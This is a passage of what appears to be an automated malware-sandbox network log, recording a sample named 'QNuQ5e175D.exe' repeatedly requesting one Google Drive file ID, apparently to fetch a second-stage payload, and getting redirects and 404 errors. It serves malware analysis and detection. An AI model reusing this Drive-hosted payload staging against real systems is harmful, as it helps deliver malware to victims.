                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449737172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:13:10 UTC258OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2025-01-11 04:13:10 UTC2230INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgRRBVsFxWTiDXRQfidilVLR7Ia_EU_qZLAq0WddOUff271D59_toVqXUgkjvGuP1NvW-SLU7kM
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:10 GMT
                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-XNdeAJo4p6EC-YET1IzUqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Set-Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd; expires=Sun, 13-Jul-2025 04:13:10 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:13:10 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 45 4c 42 37 64 6b 30 6a 48 2d 6d 41 38 5a 68 4f 4d 72 58 42 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nELB7dk0jH-mA8ZhOMrXBA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449738142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:13:21 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:21 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:21 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-oatrcb0GSwNumrv18nhU7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449739172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:13:22 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:22 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgRYzgcgZ9Wbmh56G03AjHcbsBtLw5tB8qfvxusdV58TJjo670Z-NCTllD9fVsmaV0t7aeLhmh4
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:22 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-RvEYxCsBG6gYbcFQNKwrrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:13:22 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 48 39 72 38 31 58 2d 79 43 67 77 6d 69 76 68 46 37 71 4a 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QH9r81X-yCgwmivhF7qJbw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.449740142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:13:33 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:33 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:33 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-slG8uyX4STG9O3vFRyG-nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449741172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:13:34 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:34 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgSAPf1LDa9mbRyVt3wFxVi_mf2ZhK4G77OC45KZGIFsfiCRYyQNUYjg44JKg5LjP0y2352r9Ks
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:34 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-Irh2BwOx6FeYaELw0I71-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:13:34 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 5a 76 57 39 55 76 72 2d 4d 34 47 69 34 34 64 32 52 65 59 79 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lZvW9Uvr-M4Gi44d2ReYyQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449805142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:13:45 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:46 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:45 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-fQK_h-Rz4mZLPXh60YOv9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449812172.217.16.1934437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:13:46 UTC464OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:47 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC74Z7wj3dNfFJ2ww21Cok96tTb__X6y5tNVWEkDR6_VkkLawFs1lf9WDObcyb5J8ubT
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:46 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-Qsd--4vV_Jhh6LUxnWo32w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-11 04:13:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 69 57 61 50 45 52 4d 70 4c 4e 66 58 51 70 30 53 71 54 78 5a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kiWaPERMpLNfXQp0SqTxZA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.449886142.250.184.2064437776C:\Users\user\Desktop\QNuQ5e175D.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 04:13:57 UTC422OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=dXiG1MN0F5O727--zKfNNcpAqKN7IpfcWqh5dcF4DGJFQqtK68GcQl5l1fErUdtMQPe_EA_N02DA5o5ao-ZyRFXIwHgCNbuRf-Bcdz80roe-I_L5PVtwIDAMUhx0DvoLC80_9PKifiSLIAw0PiJhEdvY3qaPj8vCDE7RxJxLVfa9nvJtvB-3Ef0PUlMd
                                                        2025-01-11 04:13:58 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 04:13:58 GMT
